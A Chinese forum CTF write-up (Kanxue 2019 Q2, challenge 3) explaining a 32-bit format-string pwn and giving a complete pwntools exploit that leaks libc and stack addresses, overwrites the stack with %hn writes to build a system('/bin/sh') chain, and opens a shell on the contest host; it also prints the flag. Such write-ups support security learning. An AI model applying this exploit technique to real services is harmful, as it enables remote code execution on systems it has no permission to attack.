首页
论坛
专栏
课程

[原创]【2019看雪CTF】Q2赛季 第三题 金字塔的诅咒 WP

2019-7-2 00:12 2541

[原创]【2019看雪CTF】Q2赛季 第三题 金字塔的诅咒 WP

2019-7-2 00:12
2541

【2019看雪CTF】Q2赛季 第三题 金字塔的诅咒 WP

此题是比较简单的fmt类型的pwn题(此赛季唯一一个libc2.23的pwn题)。
因为是32位的elf,所以一切要简单得多,只不过有两个小小的限制,一是输入存放在bss上,而且是开PIE的;二是每次输入要求不大于24字节。
大概思路是:(都是fmt的利用)从栈上leak出libc地址和栈地址(栈上有ebp链,有了栈指针当然有栈地址),可通过ebp的栈指针构造指向其它栈地址的栈指针,从而实现栈的任意写,最终在栈上构造好system的rop实现get shell。

 

最终exp如下:

#!/usr/bin/env python
from pwn import *

s = lambda a: io.send(a)
sa = lambda a, b: io.sendafter(a, b)
st = lambda a, b: io.sendthen(a, b)
sl = lambda a: io.sendline(a)
sla = lambda a, b: io.sendlineafter(a, b)
slt = lambda a, b: io.sendlinethen(a, b)
r = lambda a=0x100: io.recv(a)
rl = lambda: io.recvline()
ru = lambda a: io.recvuntil(a)
it = lambda: io.interactive()


def pwn():
    #flag{c6671fc0-cea3-42ef-8af0-c20c65f854be}
    libc_main_off = 0x18540
    bin_off = 0x15902B
    sys_off = 0x3A940

    # libc_main_off = 0x18540
    # bin_off = 0x15BA0B
    # sys_off = 0x3Ada0
    sla('Choice:','1')
    sla('to say:','%11$p%5$p')
    res = rl() 
    libc_main_addr = int(res[2:10],16) - 247
    stack_addr = int(res[12:20],16)
    sys_addr = libc_main_addr - libc_main_off + sys_off
    bin_addr = libc_main_addr - libc_main_off + bin_off    
    log.info('sys addr :'+hex(sys_addr))
    sla('Choice:','1')
    sla('to say:','%%%dc%%5$hn'%((stack_addr-0x98)&0xffff))
    sla('Choice:','1')
    sla('to say:','%%%dc%%53$hn'%((sys_addr)&0xffff))

    sla('Choice:','1')
    sla('to say:','%%%dc%%5$hn'%((stack_addr-0x98+2)&0xffff))
    sla('Choice:','1')
    sla('to say:','%%%dc%%53$hn'%((sys_addr>>16)&0xffff))

    sla('Choice:','1')
    sla('to say:','%%%dc%%5$hn'%((stack_addr-0x90)&0xffff))
    sla('Choice:','1')
    sla('to say:','%%%dc%%53$hn'%((bin_addr)&0xffff))

    sla('Choice:','1')
    sla('to say:','%%%dc%%5$hn'%((stack_addr-0x90+2)&0xffff))
    sla('Choice:','1')
    sla('to say:','%%%dc%%53$hn'%((bin_addr>>16)&0xffff))  



    # gdb.attach(io,'b main')  
    sla('Choice:','2')


    it()


if __name__  ==  '__main__':
    context(arch='i386', kernel='i386', os='linux')    
    HOST, PORT = '152.136.18.34', 9999
    # elf = ELF('./libc.so.6')    
    if len(sys.argv) > 1 and sys.argv[1] == 'l': 
        io = process('./format')#,env = {'LD_PRELOAD':'./libc.so.6'})        
        context.log_level = 'debug'        
    else:   
        io = remote(HOST, PORT)  
        # context.log_level = 'debug'             
    pwn()


[公告]安全服务和外包项目请将项目需求发到看雪企服平台:https://qifu.kanxue.com

最新回复 (0)
游客
登录 | 注册 方可回帖
返回